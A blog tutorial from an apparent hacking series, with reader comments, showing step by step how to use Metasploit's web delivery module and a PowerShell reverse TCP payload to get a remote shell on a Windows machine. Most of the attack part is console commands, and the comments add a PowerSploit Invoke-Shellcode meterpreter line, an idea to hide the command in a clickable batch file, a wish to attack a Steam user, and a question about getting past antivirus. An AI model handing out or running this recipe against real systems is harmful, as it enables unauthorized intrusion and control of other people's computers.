Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 13 (Web Delivery for Windows)

Metasploit for the Aspiring Hacker, Part 13 (Web Delivery for Windows)

Welcome back, my hacker novitiates!

In the previous part of this series, we looked at how to use Metasploit's web delivery exploit to create a script to connect to a UNIX, Linux, or OS X machine using Python. Many members of the Null Byte community have asked me, "Can we do the same for a Windows systems?" The answer is YES!

Although the web delivery exploit will work on Windows systems that have Python installed, few Windows systems actually have Python installed while nearly ever UNIX, Linux, and OS X has Python installed by default. Fortunately, those Windows systems do have PowerShell installed by default, and we can use it with Metasploit's web delivery exploit to take control of those systems.

In this tutorial, we will use Metasploit's web delivery exploit to take control of a Windows system through its PowerShell.

Step 1: Start Metasploit

To begin, fire up your Kali system, open a terminal, and start Metasploit.

kali > msfconsole

Step 2: Loading the Web Delivery Exploit

Like already mentioned above, using Metasploit's web delivery is very similar to web delivery on Unix, Linux, and OS X systems except that Windows systems don't have Python installed by default. But they do have Windows PowerShell, and there is a web delivery module for that.

Let's load the web delivery exploit in Metasploit:

msf > use exploit/multi/script/web_delivery

Next, we need to set the LHOST and LPORT exactly like we did with the Unix/Linux/OS X web delivery exploit.

msf > set LHOST 192.1681.153

msf > set LPORT 4444

Next, we need to set the URIPATH. This can be set to anything you please. I set it here to "powersploit", but you can set it to anything you like.

msf > set URIPATH powersploit

Step 3: Set the Target to PowerShell

By default, the web delivery exploit in Metasploit uses Python scripts. To use the Windows-based PowerShell option, we need to set the target to 2.

msf > set target 2

With the target set to 2, Metasploit will create a PowerShell script when we are ready to exploit.

Step 4: Set the Payload

Lastly, we need to set the payload. Let's use the windows/powershell_reverse_tcp payload.

msf > set payload windows/powershell_reverse_tcp

Before we start the exploit, set checks the options to see whether we have all of them set properly.

Now, we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows system.

Next, open a command prompt on the target Windows system and run that command like below.

When you hit enter, that command will open a connection to the attack machine.

Now, on the attack system, we can check to see whether the session has opened by typing:

sessions -l

As you can see above, we have a session opened with an ID of 1. We can use that session by typing:

sessions -i 1

Where 1 is the ID of the session. If your session ID is different, such as 2, 3, etc., you should use that ID in the command above.

Now we have a session on the Windows machine. Success! We can now check to see the running processes on the target system by typing:

PS C: \Users\OTW > Get-Process

Now, that we are connected to the Windows machine's PowerShell, we can run any of the PowerShell "command-lets" as well as the most common Linux commands.

In a future tutorial, I will show you how to use the PowerSploit modules to gain even more control and access on that Windows machine, so keep coming back, my hacker novitiates!

12 Comments

another great post keep em coming!

hey OTW,
stuck on it!!!!!

Hey OTW! So basically I was wondering a few things.

Firstly a complete random befriended me on Steam and says he's a hacker, he knows my name, address and some other incriminating information. Now I would be worried if he wasn't friends with one of my other friends and also that same friend knows everything that he has stated so far, so I wanted to show him the full wrath of a real hacker...but I don't know how to hack through Steam

Secondly we all know that Watchdogs is a fictional game and the whole idea of the ctOS is a pretty dumb one, but then I got me thinking isn't it still all possible, like for example would a way of stopping the trains be instead hacking the train you would hack a nearby power station or sub station to cut off the power to the train or even the whole track.

Thanks for your time

R.J

cool, currently testing out msf for windows, going to try create a batch file when clicked runs the command

Fantastic and works perfectly, even against Windows 10. Do you know if there is any way to copy files from the Host System to the Victim or vice-versa once connected? Once connected to the victim, it appears that you are no longer working within the Host (in my case Kali) filesystem, therefore this is not possible? Is there a work around for this?

Thanks

lewis check out OTW meterpreter post exploitation series

I've tried to start a meterpreter shell by using the powersploit invoke-shellcode command but whenever i try to use i get the following error:

PS C:\Users\#####> Invoke-Shellcode -Payload windows/meterpreter/reversehttps -Lhost 192.168.1.124 -Lport 4445 -Force
PS C:\Users\#####> Invoke-Shellcode : A parameter cannot be found that matches parameter name 'Payload'.
At line:1 char:26

  • Invoke-Shellcode -Payload <<<< windows/meterpreter/reversehttps -Lhost 192. 168 .1.124 -Lport 4445 -Force
  • CategoryInfo : InvalidArgument: (:) Invoke-Shellcode, ParameterBindingException
  • FullyQualifiedErrorId : NamedParameterNotFound,Invoke-Shellcode

I've tried updating the Powersploit files, I even tried to used an older version but i still get the same error. Please help me if you can, thank you

EDIT: I fixed the problem, nevermind

Ok, so i got the correct version of invoke-shellcode.ps1 loaded onto my computer but now when i attempt to invoke-shellcode the reverse http payload it crashes the powershell on the target computer and the handler i set up gets this message

192.168.1.190:1741 Unknown request to /INITM with UA 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'

I've tried to look elsewhere for a fix but nobody else has had this problem, sorry to bother you

NO action ,maybe i input the wrong string.

How can we encrypt the payload??? I tried it on my PC at my LAN but my ESET Av found it and terminated the connection...

Share Your Thoughts

  • Hot
  • Latest